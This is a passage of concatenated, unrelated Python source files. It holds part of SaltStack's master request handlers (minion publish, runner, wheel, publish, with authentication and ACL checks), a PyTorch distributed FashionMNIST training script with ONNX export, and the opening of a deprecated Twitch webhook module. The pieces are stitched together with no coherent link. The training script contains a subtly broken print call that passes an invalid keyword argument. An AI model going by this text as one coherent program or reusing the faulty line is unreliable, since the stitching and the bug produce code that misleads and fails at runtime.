'tok')) if load is False: return {} # Check that this minion can access this data auth_cache = os.path.join( self.opts['cachedir'], 'publish_auth') if not os.path.isdir(auth_cache): os.makedirs(auth_cache) jid_fn = os.path.join(auth_cache, six.text_type(load['jid'])) with salt.utils.files.fopen(jid_fn, 'r') as fp_: if not load['id'] == fp_.read(): return {} # Grab the latest and return return self.local.get_cache_returns(load['jid']) def minion_pub(self, clear_load): ''' Publish a command initiated from a minion, this method executes minion restrictions so that the minion publication will only work if it is enabled in the config. The configuration on the master allows minions to be matched to salt functions, so the minions can only publish allowed salt functions The config will look like this: .. code-block:: bash peer: .*: - .* This configuration will enable all minions to execute all commands: .. code-block:: bash peer: foo.example.com: - test.* The above configuration will only allow the minion foo.example.com to execute commands from the test module. :param dict clear_load: The minion pay ''' if not self.__verify_minion_publish(clear_load): return {} else: return self.masterapi.minion_pub(clear_load) def minion_publish(self, clear_load): ''' Publish a command initiated from a minion, this method executes minion restrictions so that the minion publication will only work if it is enabled in the config. The configuration on the master allows minions to be matched to salt functions, so the minions can only publish allowed salt functions The config will look like this: .. code-block:: bash peer: .*: - .* This configuration will enable all minions to execute all commands. peer: .. code-block:: bash foo.example.com: - test.* The above configuration will only allow the minion foo.example.com to execute commands from the test module. :param dict clear_load: The minion payload ''' if not self.__verify_minion_publish(clear_load): return {} else: return self.masterapi.minion_publish(clear_load) def revoke_auth(self, load): ''' Allow a minion to request revocation of its own key :param dict load: The minion payload :rtype: dict :return: If the load is invalid, it may be returned. No key operation is performed. :rtype: bool :return: True if key was revoked, False if not ''' load = self.__verify_load(load, ('id', 'tok')) if not self.opts.get('allow_minion_key_revoke', False): log.warning( 'Minion %s requested key revoke, but allow_minion_key_revoke ' 'is set to False', load['id'] ) return load if load is False: return load else: return self.masterapi.revoke_auth(load) def run_func(self, func, load): ''' Wrapper for running functions executed with AES encryption :param function func: The function to run :return: The result of the master function that was called ''' # Don't honor private functions if func.startswith('__'): # TODO: return some error? Seems odd to return {} return {}, {'fun': 'send'} # Run the func if hasattr(self, func): try: start = time.time() ret = getattr(self, func)(load) log.trace( 'Master function call %s took %s seconds', func, time.time() - start ) except Exception: ret = '' log.error('Error in function %s:\n', func, exc_info=True) else: log.error( 'Received function %s which is unavailable on the master, ' 'returning False', func ) return False, {'fun': 'send'} # Don't encrypt the return value for the _return func # (we don't care about the return value, so why encrypt it?) if func == '_return': return ret, {'fun': 'send'} if func == '_pillar' and 'id' in load: if load.get('ver') != '2' and self.opts['pillar_version'] == 1: # Authorized to return old pillar proto return ret, {'fun': 'send'} return ret, {'fun': 'send_private', 'key': 'pillar', 'tgt': load['id']} # Encrypt the return return ret, {'fun': 'send'} class ClearFuncs(TransportMethods): ''' Set up functions that are safe to execute when commands sent to the master without encryption and authentication ''' # These methods will be exposed to the transport layer by # MWorker._handle_clear expose_methods = ( 'ping', 'publish', 'get_token', 'mk_token', 'wheel', 'runner', ) # The ClearFuncs object encapsulates the functions that can be executed in # the clear: # publish (The publish from the LocalClient) # _auth def __init__(self, opts, key): self.opts = opts self.key = key # Create the event manager self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False) # Make a client self.local = salt.client.get_local_client(self.opts['conf_file']) # Make an minion checker object self.ckminions = salt.utils.minions.CkMinions(opts) # Make an Auth object self.loadauth = salt.auth.LoadAuth(opts) # Stand up the master Minion to access returner data self.mminion = salt.minion.MasterMinion( self.opts, states=False, rend=False, ignore_config_errors=True ) # Make a wheel object self.wheel_ = salt.wheel.Wheel(opts) # Make a masterapi object self.masterapi = salt.daemons.masterapi.LocalFuncs(opts, key) def runner(self, clear_load): ''' Send a master control function back to the runner system ''' # All runner ops pass through eauth auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load) # Authenticate auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key) error = auth_check.get('error') if error: # Authentication error occurred: do not continue. return {'error': error} # Authorize username = auth_check.get('username') if auth_type != 'user': runner_check = self.ckminions.runner_check( auth_check.get('auth_list', []), clear_load['fun'], clear_load.get('kwarg', {}) ) if not runner_check: return {'error': {'name': err_name, 'message': 'Authentication failure of type "{0}" occurred for ' 'user {1}.'.format(auth_type, username)}} elif isinstance(runner_check, dict) and 'error' in runner_check: # A dictionary with an error name/message was handled by ckminions.runner_check return runner_check # No error occurred, consume sensitive settings from the clear_load if passed. for item in sensitive_load_keys: clear_load.pop(item, None) else: if 'user' in clear_load: username = clear_load['user'] if salt.auth.AuthUser(username).is_sudo(): username = self.opts.get('user', 'root') else: username = salt.utils.user.get_user() # Authorized. Do the job! try: fun = clear_load.pop('fun') runner_client = salt.runner.RunnerClient(self.opts) return runner_client.asynchronous(fun, clear_load.get('kwarg', {}), username, local=True) except Exception as exc: log.error('Exception occurred while introspecting %s: %s', fun, exc) return {'error': {'name': exc.__class__.__name__, 'args': exc.args, 'message': six.text_type(exc)}} def wheel(self, clear_load): ''' Send a master control function back to the wheel system ''' jid = clear_load.get('__jid__', salt.utils.jid.gen_jid(self.opts)) # All wheel ops pass through eauth auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load) # Authenticate auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key) error = auth_check.get('error') if error: # Authentication error occurred: do not continue. data = {'error': error, 'jid': jid} self.event.fire_event(data, tagify([jid, "new"], "wheel")) return {'error': error} # Authorize username = auth_check.get('username') if auth_type != 'user': wheel_check = self.ckminions.wheel_check( auth_check.get('auth_list', []), clear_load['fun'], clear_load.get('kwarg', {}) ) if not wheel_check: err_data = { 'name': err_name, 'message': 'Authentication failure of type "{0}" occurred for ' 'user {1}.'.format(auth_type, username) } data = {'error': err_data, 'jid': jid} self.event.fire_event(data, tagify([jid, "new"], "wheel")) return {'error': err_data} elif isinstance(wheel_check, dict) and 'error' in wheel_check: # A dictionary with an error name/message was handled by ckminions.wheel_check return wheel_check # No error occurred, consume sensitive settings from the clear_load if passed. for item in sensitive_load_keys: clear_load.pop(item, None) else: if 'user' in clear_load: username = clear_load['user'] if salt.auth.AuthUser(username).is_sudo(): username = self.opts.get('user', 'root') else: username = salt.utils.user.get_user() # Authorized. Do the job! try: fun = clear_load.pop('fun') tag = tagify(jid, prefix='wheel') data = {'fun': "wheel.{0}".format(fun), 'jid': jid, 'tag': tag, 'user': username} self.event.fire_event(data, tagify([jid, 'new'], 'wheel')) ret = self.wheel_.call_func(fun, full_return=True, **clear_load) data['return'] = ret['return'] data['success'] = ret['success'] self.event.fire_event(data, tagify([jid, 'ret'], 'wheel')) return {'tag': tag, 'data': data} except Exception as exc: log.error('Exception occurred while introspecting %s: %s', fun, exc) data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format( fun, exc.__class__.__name__, exc, ) data['success'] = False self.event.fire_event(data, tagify([jid, 'ret'], 'wheel')) return {'tag': tag, 'data': data} def mk_token(self, clear_load): ''' Create and return an authentication token, the clear load needs to contain the eauth key and the needed authentication creds. ''' token = self.loadauth.mk_token(clear_load) if not token: log.warning('Authentication failure of type "eauth" occurred.') return '' return token def get_token(self, clear_load): ''' Return the name associated with a token or False if the token is invalid ''' if 'token' not in clear_load: return False return self.loadauth.get_tok(clear_load['token']) def publish(self, clear_load): ''' This method sends out publications to the minions, it can only be used by the LocalClient. ''' extra = clear_load.get('kwargs', {}) publisher_acl = salt.acl.PublisherACL(self.opts['publisher_acl_blacklist']) if publisher_acl.user_is_blacklisted(clear_load['user']) or \ publisher_acl.cmd_is_blacklisted(clear_load['fun']): log.error( '%s does not have permissions to run %s. Please contact ' 'your local administrator if you believe this is in ' 'error.\n', clear_load['user'], clear_load['fun'] ) return {'error': {'name': 'AuthorizationError', 'message': 'Authorization error occurred.'}} # Retrieve the minions list delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM) _res = self.ckminions.check_minions( clear_load['tgt'], clear_load.get('tgt_type', 'glob'), delimiter ) minions = _res.get('minions', list()) missing = _res.get('missing', list()) ssh_minions = _res.get('ssh_minions', False) # Check for external auth calls and authenticate auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(extra) if auth_type == 'user': auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key) else: auth_check = self.loadauth.check_authentication(extra, auth_type) # Setup authorization list variable and error information auth_list = auth_check.get('auth_list', []) err_msg = 'Authentication failure of type "{0}" occurred.'.format(auth_type) if auth_check.get('error'): # Authentication error occurred: do not continue. log.warning(err_msg) return {'error': {'name': 'AuthenticationError', 'message': 'Authentication error occurred.'}} # All Token, Eauth, and non-root users must pass the authorization check if auth_type != 'user' or (auth_type == 'user' and auth_list): # Authorize the request authorized = self.ckminions.auth_check( auth_list, clear_load['fun'], clear_load['arg'], clear_load['tgt'], clear_load.get('tgt_type', 'glob'), minions=minions, # always accept find_job whitelist=['saltutil.find_job'], ) if not authorized: # Authorization error occurred. Do not continue. if auth_type == 'eauth' and not auth_list and 'username' in extra and 'eauth' in extra: log.debug('Auth configuration for eauth "%s" and user "%s" is empty', extra['eauth'], extra['username']) log.warning(err_msg) return {'error': {'name': 'AuthorizationError', 'message': 'Authorization error occurred.'}} # Perform some specific auth_type tasks after the authorization check if auth_type == 'token': username = auth_check.get('username') clear_load['user'] = username log.debug('Minion tokenized user = "%s"', username) elif auth_type == 'eauth': # The username we are attempting to auth with clear_load['user'] = self.loadauth.load_name(extra) # If we order masters (via a syndic), don't short circuit if no minions # are found if not self.opts.get('order_masters'): # Check for no minions if not minions: return { 'enc': 'clear', 'load': { 'jid': None, 'minions': minions, 'error': 'Master could not resolve minions for target {0}'.format(clear_load['tgt']) } } jid = self._prep_jid(clear_load, extra) if jid is None: return {'enc': 'clear', 'load': {'error': 'Master failed to assign jid'}} payload = self._prep_pub(minions, jid, clear_load, extra, missing) # Send it! self._send_ssh_pub(payload, ssh_minions=ssh_minions) self._send_pub(payload) return { 'enc': 'clear', 'load': { 'jid': clear_load['jid'], 'minions': minions, 'missing': missing } } def _prep_auth_info(self, clear_load): sensitive_load_keys = [] key = None if 'token' in clear_load: auth_type = 'token' err_name = 'TokenAuthenticationError' sensitive_load_keys = ['token'] elif 'eauth' in clear_load: auth_type = 'eauth' err_name = 'EauthAuthenticationError' sensitive_load_keys = ['username', 'password'] else: auth_type = 'user' err_name = 'UserAuthenticationError' key = self.key return auth_type, err_name, key, sensitive_load_keys def _prep_jid(self, clear_load, extra): ''' Return a jid for this publication ''' # the jid in clear_load can be None, '', or something else. this is an # attempt to clean up the value before passing to plugins passed_jid = clear_load['jid'] if clear_load.get('jid') else None nocache = extra.get('nocache', False) # Retrieve the jid fstr = '{0}.prep_jid'.format(self.opts['master_job_cache']) try: # Retrieve the jid jid = self.mminion.returners[fstr](nocache=nocache, passed_jid=passed_jid) except (KeyError, TypeError): # The returner is not present msg = ( 'Failed to allocate a jid. The requested returner \'{0}\' ' 'could not be loaded.'.format(fstr.split('.')[0]) ) log.error(msg) return {'error': msg} return jid def _send_pub(self, load): ''' Take a load and send it across the network to connected minions ''' for transport, opts in iter_transport_opts(self.opts): chan = salt.transport.server.PubServerChannel.factory(opts) chan.publish(load) @property def ssh_client(self): if not hasattr(self, '_ssh_client'): self._ssh_client = salt.client.ssh.client.SSHClient(mopts=self.opts) return self._ssh_client def _send_ssh_pub(self, load, ssh_minions=False): ''' Take a load and send it across the network to ssh minions ''' if self.opts['enable_ssh_minions'] is True and ssh_minions is True: log.debug('Send payload to ssh minions') threading.Thread(target=self.ssh_client.cmd, kwargs=load).start() def _prep_pub(self, minions, jid, clear_load, extra, missing): ''' Take a given load and perform the necessary steps to prepare a publication. TODO: This is really only bound by temporal cohesion and thus should be refactored even further. ''' clear_load['jid'] = jid delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM) # TODO Error reporting over the master event bus self.event.fire_event({'minions': minions}, clear_load['jid']) new_job_load = { 'jid': clear_load['jid'], 'tgt_type': clear_load['tgt_type'], 'tgt': clear_load['tgt'], 'user': clear_load['user'], 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'minions': minions, 'missing': missing, } # Announce the job on the event bus self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job')) if self.opts['ext_job_cache']: fstr = '{0}.save_load'.format(self.opts['ext_job_cache']) save_load_func = True # Get the returner's save_load arg_spec. try: arg_spec = salt.utils.args.get_function_argspec(self.mminion.returners[fstr]) # Check if 'minions' is included in returner's save_load arg_spec. # This may be missing in custom returners, which we should warn about. if 'minions' not in arg_spec.args: log.critical( 'The specified returner used for the external job cache ' '\'%s\' does not have a \'minions\' kwarg in the returner\'s ' 'save_load function.', self.opts['ext_job_cache'] ) except (AttributeError, KeyError): save_load_func = False log.critical( 'The specified returner used for the external job cache ' '"%s" does not have a save_load function!', self.opts['ext_job_cache'] ) if save_load_func: try: self.mminion.returners[fstr](clear_load['jid'], clear_load, minions=minions) except Exception: log.critical( 'The specified returner threw a stack trace:\n', exc_info=True ) # always write out to the master job caches try: fstr = '{0}.save_load'.format(self.opts['master_job_cache']) self.mminion.returners[fstr](clear_load['jid'], clear_load, minions) except KeyError: log.critical( 'The specified returner used for the master job cache ' '"%s" does not have a save_load function!', self.opts['master_job_cache'] ) except Exception: log.critical( 'The specified returner threw a stack trace:\n', exc_info=True ) # Set up the payload payload = {'enc': 'aes'} # Altering the contents of the publish load is serious!! Changes here # break compatibility with minion/master versions and even tiny # additions can have serious implications on the performance of the # publish commands. # # In short, check with Thomas Hatch before you even think about # touching this stuff, we can probably do what you want to do another # way that won't have a negative impact. load = { 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'tgt': clear_load['tgt'], 'jid': clear_load['jid'], 'ret': clear_load['ret'], } # if you specified a master id, lets put that in the load if 'master_id' in self.opts: load['master_id'] = self.opts['master_id'] # if someone passed us one, use that if 'master_id' in extra: load['master_id'] = extra['master_id'] # Only add the delimiter to the pub data if it is non-default if delimiter != DEFAULT_TARGET_DELIM: load['delimiter'] = delimiter if 'id' in extra: load['id'] = extra['id'] if 'tgt_type' in clear_load: load['tgt_type'] = clear_load['tgt_type'] if 'to' in clear_load: load['to'] = clear_load['to'] if 'kwargs' in clear_load: if 'ret_config' in clear_load['kwargs']: load['ret_config'] = clear_load['kwargs'].get('ret_config') if 'metadata' in clear_load['kwargs']: load['metadata'] = clear_load['kwargs'].get('metadata') if 'module_executors' in clear_load['kwargs']: load['module_executors'] = clear_load['kwargs'].get('module_executors') if 'executor_opts' in clear_load['kwargs']: load['executor_opts'] = clear_load['kwargs'].get('executor_opts') if 'ret_kwargs' in clear_load['kwargs']: load['ret_kwargs'] = clear_load['kwargs'].get('ret_kwargs') if 'user' in clear_load: log.info( 'User %s Published command %s with jid %s', clear_load['user'], clear_load['fun'], clear_load['jid'] ) load['user'] = clear_load['user'] else: log.info( 'Published command %s with jid %s', clear_load['fun'], clear_load['jid'] ) log.debug('Published command details %s', load) return load def ping(self, clear_load): ''' Send the load back to the sender. ''' return clear_load class FloMWorker(MWorker): ''' Change the run and bind to be ioflo friendly ''' def __init__(self, opts, key, ): MWorker.__init__(self, opts, key) def setup(self): ''' Prepare the needed objects and socket for iteration within ioflo ''' salt.utils.crypt.appendproctitle(self.__class__.__name__) self.clear_funcs = salt.master.ClearFuncs( self.opts, self.key, ) self.aes_funcs = salt.master.AESFuncs(self.opts) self.context = zmq.Context(1) self.socket = self.context.socket(zmq.REP) if self.opts.get('ipc_mode', '') == 'tcp': self.w_uri = 'tcp://127.0.0.1:{0}'.format( self.opts.get('tcp_master_workers', 4515) ) else: self.w_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'workers.ipc') ) log.info('ZMQ Worker binding to socket %s', self.w_uri) self.poller = zmq.Poller() self.poller.register(self.socket, zmq.POLLIN) self.socket.connect(self.w_uri) def handle_request(self): ''' Handle a single request ''' try: polled = self.poller.poll(1) if polled: package = self.socket.recv() self._update_aes() payload = self.serial.loads(package) ret = self.serial.dumps(self._handle_payload(payload)) self.socket.send(ret) except KeyboardInterrupt: raise except Exception as exc: # Properly handle EINTR from SIGUSR1 if isinstance(exc, zmq.ZMQError) and exc.errno == errno.EINTR: return
train_dist_onnx.py
import time import argparse import sys import os import threading import torch import torch.distributed as dist import torch.nn as nn import torch.nn.functional as F import torch.optim as optim import torch.onnx from math import ceil from random import Random from torch.multiprocessing import Process from torch.autograd import Variable from torchvision import datasets, transforms class Net(nn.Module): """ Network architecture. """ def __init__(self): super(Net, self).__init__() self.conv1 = nn.Conv2d(1, 10, kernel_size=5) self.conv2 = nn.Conv2d(10, 20, kernel_size=5) self.conv2_drop = nn.Dropout2d() self.fc1 = nn.Linear(320, 50) self.fc2 = nn.Linear(50, 10) def forward(self, x): x = F.relu(F.max_pool2d(self.conv1(x), 2)) x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2)) x = x.view(-1, 320) x = F.relu(self.fc1(x)) x = F.dropout(x, training=self.training) x = self.fc2(x) return F.log_softmax(x, dim=1) def get_dataset(): """ Get FashionMNIST dataset """ data_path = os.environ.get("DATA_DIR") + '/data' trainset = datasets.FashionMNIST( data_path, train=True, download=False, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.1307, ), (0.3081, )) ])) testset = datasets.FashionMNIST( data_path, train=False, download=False, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.1307, ), (0.3081, )) ])) return trainset, testset def average_gradients(model): """ Gradient averaging. """ size = float(dist.get_world_size()) for param in model.parameters(): dist.all_reduce(param.grad.data, op=dist.reduce_op.SUM, group=dist.group.WORLD) param.grad.data /= size def multigpu_average_gradients(model): """ Gradient averaging. """ size = float(dist.get_world_size()) tensor_list = [] for dev_idx in range(torch.cuda.device_count()): tensor_list.append(torch.FloatTensor([1]).cuda(dev_idx)) dist.all_reduce_multigpu(tensor_list, op=dist.reduce_op.SUM, group=dist.group.WORLD) for tensor in tensor_list: tensor /= size*len(tensor_list) def run(rank, size, batch_size, is_gpu): """ Distributed Synchronous SGD Example """ torch.manual_seed(1234) train_set, test_set = get_dataset() result_dir = os.environ.get("RESULT_DIR") + '/saved_model' # For GPU use if is_gpu: #torch.cuda.set_device(local_device) model = Net().cuda() else: model = Net() if not (size == 1): model = torch.nn.parallel.DistributedDataParallel(model) train_sampler = torch.utils.data.distributed.DistributedSampler(train_set, num_replicas=dist.get_world_size(), rank=dist.get_rank()) train_set = torch.utils.data.DataLoader( train_set, batch_size=batch_size, shuffle=(train_sampler is None), sampler=train_sampler, pin_memory=True) test_set = torch.utils.data.DataLoader( test_set, batch_size=batch_size, shuffle=True, pin_memory=True) optimizer = optim.SGD(model.parameters(), lr=0.01, momentum=0.9) # To train model model.train() for epoch in range(100): epoch_loss = 0.0 for data, target in train_set: # For GPU use if is_gpu: data, target = data.cuda(), target.cuda() else: data, target = Variable(data), Variable(target) optimizer.zero_grad() output = model(data) loss = F.nll_loss(output, target) epoch_loss += loss.item() loss.backward() if not (size == 1): average_gradients(model) optimizer.step() print('Process ', ', epoch ', epoch, '. avg_loss: ', epoch_loss / len(train_set), rank=dist.get_rank()) # Test model if int(os.environ.get("LEARNER_ID")) == 1: model.eval() test_loss = 0.0 correct = 0 with torch.no_grad(): for data, target in test_set: # For GPU use if is_gpu: data, target = data.cuda(), target.cuda() else: data, target = Variable(data), Variable(target) output = model(data) test_loss += F.nll_loss(output, target, reduction="sum").item() pred = output.data.max(1, keepdim=True)[1] correct += pred.eq(target.data.view_as(pred)).sum().item() print('Test_set: avg_loss: ', test_loss / len(test_set.dataset), ', accuracy: ', 100. * correct / len(test_set.dataset), '%') # Save model if int(os.environ.get("LEARNER_ID")) == 1: torch.save(model, result_dir) dummy_input = "" if is_gpu: dummy_input = Variable(torch.randn(1, 1, 28, 28)).cuda() else: dummy_input = Variable(torch.randn(1, 1, 28, 28)) model_path = os.environ.get("RESULT_DIR") + "/pytorch-dist.onnx" torch.onnx.export(model, dummy_input, model_path) # Change 'backend' to appropriate backend identifier def init_processes(rank, size, fn, path_to_file, batch_size, is_gpu, backend): """ Initialize the distributed environment. """ print("Process ", rank, " connected") dist.init_process_group(backend, init_method=path_to_file, world_size=size, group_name="train_dist", rank=rank) print("FOUND SHARED FILE") fn(rank, size, batch_size, is_gpu) def local_process(target, args): return Process(target=target, args=args) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('--batch_size', type=int, default=1024, help='Specify the batch size to be used in training') args = parser.parse_args() # Default batch size is set to 1024. When using a large numbers of learners, # a larger batch size is sometimes necessary to see speed improvements. batch_size = args.batch_size start_time = time.time() num_gpus = int(float(os.environ.get("GPU_COUNT"))) if num_gpus == 0: world_size = int(os.environ.get("NUM_LEARNERS")) else: world_size = num_gpus * int(os.environ.get("NUM_LEARNERS")) data_dir = "file:///job/" + os.environ.get("TRAINING_ID") processes = [] print("data_dir is " + data_dir) if world_size == 1: run(0, 1, batch_size, (num_gpus == 1)) print("COMPLETION TIME: ", time.time() - start_time) else: if num_gpus == 0: p = local_process(init_processes, (0 , world_size, run, data_dir, batch_size, False, 'gloo')) p.start() processes.append(p) else: for process_num in range(0, num_gpus): p = local_process(init_processes, (process_num*int(os.environ.get("NUM_LEARNERS")) + int(os.environ.get("LEARNER_ID")) - 1, world_size, run, data_dir, batch_size, True, 'gloo')) p.start() processes.append(p) for p in processes: p.join() print("COMPLETION TIME: ", time.time() - start_time) # FfDL assume only the master learner job will terminate and store all # the logging file. if int(os.environ.get("LEARNER_ID")) != 1: while True: time.sleep(1000000)
webhook.py
# Copyright (c) 2020. Lena "Teekeks" During <info@teawork.de> """ Full Implementation of the Twitch Webhook ----------------------------------------- .. warning:: Webhooks have been discontinued. The Webhook runs in its own thread, calling the given callback function whenever an webhook event happens. Look at the `Twitch Webhook reference <https://dev.twitch.tv/docs/api/webhooks-reference>`__ to find the topics you are interested in. ************ Requirements ************ You need to have a public IP with a port open. That port will be 80 by default. Authentication is off by default but you can choose to authenticate to use some Webhook Topics or to get more information. .. note:: Please note that Your Endpoint URL has to be HTTPS if you need authentication which means that you probably need a reverse proxy like nginx. You can also hand in a valid ssl context to be used in the constructor. You can check on whether or not your webhook is publicly reachable by navigating to the URL set in `callback_url`. You should get a 200 response with the text `pyTwitchAPI webhook`. ******************* Short code example: ******************* .. code-block:: python from twitchAPI.twitch import Twitch from twitchAPI.webhook import TwitchWebHook from pprint import pprint def callback_stream_changed(uuid, data): print('Callback for UUID ' + str(uuid)) pprint(data) twitch = Twitch(td['app_id'], td['secret']) twitch.authenticate_app([]) user_info = twitch.get_users(logins=['my_twitch_user']) user_id = user_info['data'][0]['id'] # basic setup # Please note that the first parameter is the domain your webhook is reachable from the outside, the last parameter # is the port that the Webhook should use hook = TwitchWebHook("https://my.cool.domain.net:443", 'my_app_id', 8080) hook.authenticate(twitch) hook.start() print('subscribing to hook:') success, uuid = hook.subscribe_stream_changed(user_id, callback_stream_changed) pprint(success) pprint(twitch.get_webhook_subscriptions()) # the webhook is now running and you are subscribed to the topic you want to listen to. lets idle a bit... input('press Enter to shut down') hook.stop() print('done') ********************* Subscription handling ********************* You can subscribe to webhook topics using the :code:`subscribe_` prefixed methods. If :attr:`~.TwitchWebHook.wait_for_subscription_confirm` is True (default), this will wait for the full handshake and confirmation to happen, otherwise the returned success value might be inaccurate in case the subscription itself succeeded but the final handshake failed. You can unsubscribe from a webhook subscription at any time by using :meth:`~twitchAPI.webhook.TwitchWebHook.unsubscribe` If :attr:`~.TwitchWebHook.unsubscribe_on_stop` is True (default), you don't need to manually unsubscribe from topics. By default, subscriptions will be automatically renewed one minute before they run out for as long as the webhook is running. You can also use :meth:`~twitchAPI.webhook.TwitchWebHook.unsubscribe_all` to unsubscribe from all topic subscriptions at once. This will also unsubscribe from topics that where left over from a previous run. *********************** Fixing typical problems *********************** * Make sure that your set URL is reachable from outside your network. * Make sure that you use a non self signed SSL certificate (use one from e.g. Let's Encrypt) if you use any Authentication. * If you change your domain's DNS, it can take up to 24 hours (or more) to propagate the changes across the entire internet and reach the Twitch servers. ******************** Class Documentation: ******************** """ from typing import Union, Tuple, Callable, List, Optional from .helper import build_url, TWITCH_API_BASE_URL, get_uuid, get_json, make_fields_datetime, fields_to_enum from .helper import extract_uuid_str_from_url from .types import * import requests from aiohttp import web import threading import asyncio from uuid import UUID from logging import getLogger, Logger import time from .twitch import Twitch from concurrent.futures._base import CancelledError from ssl import SSLContext class TwitchWebHook: """Webhook integration for the Twitch Helix API. :param str callback_url: The full URL of the webhook. :param str api_client_id: The id of your API client :param int port: the port on which this webhook should run :param ~ssl.SSLContext ssl_context: optional ssl context to be used |default| :code:`None` :var str secret: A random secret string. Set this for added security. :var str callback_url: The full URL of the webhook. :var int subscribe_least_seconds: The duration in seconds for how long you want to subscribe to webhhoks. Min 300 Seconds, Max 864000 Seconds. |default| :code:`600` :var bool auto_renew_subscription: If True, automatically renew all webhooks once they get close to running out. **Only disable this if you know what you are doing.** |default| :code:`True` :var bool wait_for_subscription_confirm: Set this to false if you dont want to wait for a subscription confirm. |default| :code:`True` :var int wait_for_subscription_confirm_timeout: Max time in seconds to wait for a subscription confirmation. Only used if ``wait_for_subscription_confirm`` is set to True. |default| :code:`30` :var bool unsubscribe_on_stop: Unsubscribe all currently active Webhooks on calling `stop()` |default| :code:`True` """ secret = None callback_url = None subscribe_least_seconds: int = 600 auto_renew_subscription: bool = True wait_for_subscription_confirm: bool = True wait_for_subscription_confirm_timeout: int = 30 unsubscribe_on_stop: bool = True _port: int = 80 _host: str = '0.0.0.0' __twitch: Twitch = None __task_refresh = None __ssl_context = None __client_id = None __running = False __callbacks = {} __active_webhooks = {} __authenticate: bool = False __hook_thread: Union['threading.Thread', None] = None __hook_loop: Union['asyncio.AbstractEventLoop', None] = None __hook_runner: Union['web.AppRunner', None] = None __logger: Logger = None def __init__(self, callback_url: str, api_client_id: str, port: int, ssl_context: Optional[SSLContext] = None): self.callback_url = callback_url self.__client_id = api_client_id self._port = port self.__ssl_context = ssl_context self.__logger = getLogger('twitchAPI.webhook') raise DeprecatedError() # Webhooks are deprecated and can no longer be used def authenticate(self, twitch: Twitch) -> None: """Set authentication for the Webhook. Can be either a app or user token. :param ~twitchAPI.twitch.Twitch twitch: a authenticated instance of :class:`~twitchAPI.twitch.Twitch` :rtype: None :raises RuntimeError: if the callback URL does not use HTTPS """ self.__authenticate = True self.__twitch = twitch if not self.callback_url.startswith('https'): raise RuntimeError('HTTPS is required for authenticated webhook.\n' + 'Either use non authenticated webhook or use a HTTPS proxy!') def __build_runner(self): hook_app = web.Application() hook_app.add_routes([web.get('/users/follows', self.__handle_challenge), web.post('/users/follows', self.__handle_user_follows), web.get('/users/changed', self.__handle_challenge), web.post('/users/changed', self.__handle_user_changed), web.get('/streams', self.__handle_challenge), web.post('/streams', self.__handle_stream_changed), web.get('/extensions/transactions', self.__handle_challenge), web.post('/extensions/transactions', self.__handle_extension_transaction_created), web.get('/moderation/moderators/events', self.__handle_challenge), web.post('/moderation/moderators/events', self.__handle_moderator_change_events), web.get('/moderation/banned/events', self.__handle_challenge), web.post('/moderation/banned/events', self.__handle_channel_ban_change_events), web.get('/hypetrain/events', self.__handle_challenge), web.post('/hypetrain/events', self.__handle_hypetrain_events), web.get('/subscriptions/events', self.__handle_challenge), web.post('/subscriptions/events', self.__handle_subscription_events), web.get('/', self.__handle_default)]) hook_runner = web.AppRunner(hook_app) return hook_runner def __run_hook(self, runner: 'web.AppRunner'): self.__hook_runner = runner self.__hook_loop = asyncio.new_event_loop() asyncio.set_event_loop(self.__hook_loop) self.__hook_loop.run_until_complete(runner.setup()) site = web.TCPSite(runner, str(self._host), self._port, ssl_context=self.__ssl_context) self.__hook_loop.run_until_complete(site.start()) self.__logger.info('started twitch API hook on port ' + str(self._port)) # add refresh task if self.auto_renew_subscription: self.__task_refresh = self.__hook_loop.create_task(self.__refresh_task()) try: self.__hook_loop.run_forever() except (CancelledError, asyncio.CancelledError): pass async def __refresh_task(self): while True: # renew 1 Min before timer runs out: await asyncio.sleep(self.subscribe_least_seconds - 60) # make sure that the auth token is still valid: if self.__authenticate: self.__twitch.refresh_used_token() for key in self.__active_webhooks.keys(): self.renew_subscription(key) def start(self): """Starts the Webhook :rtype: None :raises ValueError: if subscribe_least_seconds is not in range 300 to 864000 :raises RuntimeError: if webhook is already running """ if self.subscribe_least_seconds < 60 * 5 or self.subscribe_least_seconds > 864000: # at least 5 min, max 864000 seconds raise ValueError('subscribe_least_second has to be in range 300 to 864000') if self.__running: raise RuntimeError('already started') self.__hook_thread = threading.Thread(target=self.__run_hook, args=(self.__build_runner(),)) self.__running = True self.__hook_thread.start() def stop(self): """Stops the Webhook Please make sure to unsubscribe from all subscriptions! :rtype: None """ if self.__hook_runner is not None: if self.unsubscribe_on_stop: all_keys = list(self.__active_webhooks.keys()) for uuid in all_keys: self.unsubscribe(uuid) if self.auto_renew_subscription: self.__task_refresh.cancel() self.__hook_loop.call_soon_threadsafe(self.__hook_loop.stop) self.__hook_runner = None self.__hook_thread.join() self.__running = False # ================================================================================================================== # HELPER # ================================================================================================================== def __build_request_header(self): headers = { "Client-ID": self.__client_id } if self.__authenticate: token = self.__twitch.get_used_token() if token is None: raise TwitchAuthorizationException('no Authorization set!') headers['Authorization'] = "Bearer " + token return headers def __api_post_request(self, url: str, data: Union[dict, None] = None): headers = self.__build_request_header() if data is None: return requests.post(url, headers=headers) else: return requests.post(url, headers=headers, data=data) def __api_get_request(self, url: str): headers = self.__build_request_header() return requests.get(url, headers=headers) def __add_callable(self, uuid: UUID, callback_func: Union[Callable, None]) -> None: arr = self.__callbacks.get(uuid) if arr is None: arr = [] if callback_func is not None: arr.append(callback_func) self.__callbacks[uuid] = arr def _subscribe(self, callback_path: str, topic_url: str, mode: str = "subscribe", 